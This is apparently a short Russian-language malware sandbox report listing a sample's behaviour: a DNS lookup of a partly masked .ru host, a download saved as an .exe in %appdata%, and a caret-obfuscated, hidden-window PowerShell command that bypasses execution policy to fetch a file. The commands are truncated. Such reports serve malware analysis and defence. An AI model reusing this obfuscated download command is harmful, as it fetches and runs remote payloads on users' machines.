Техническая информация
- http://vg#.##rldnews932.ru/file/nit.nbv как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^W^eRSh^EL^l.E^xE^ -e^XecUTIoNpoLiCY By^pAss -n^o^P^r^ofi^LE -wi^NdO^w^s^tyLe^ ^hID^d^eN (N^Ew-oBJE^C^t^ s^yS^tEM^.n^e^T.WEbCl^iEnT).dO^w^n^lO^aDfile(^'http://vg#.##rldnews9...
- DNS ASK vg#.##rldnews932.ru
- '<SYSTEM32>\cmd.exe' /C "po^W^eRSh^EL^l.E^xE^ -e^XecUTIoNpoLiCY By^pAss -n^o^P^r^ofi^LE -wi^NdO^w^s^tyLe^ ^hID^d^eN (N^Ew-oBJE^C^t^ s^yS^tEM^.n^e^T.WEbCl^iEnT).dO^w^n^lO^aDfile(^'http://vg#.##rldnews9...' (со скрытым окном)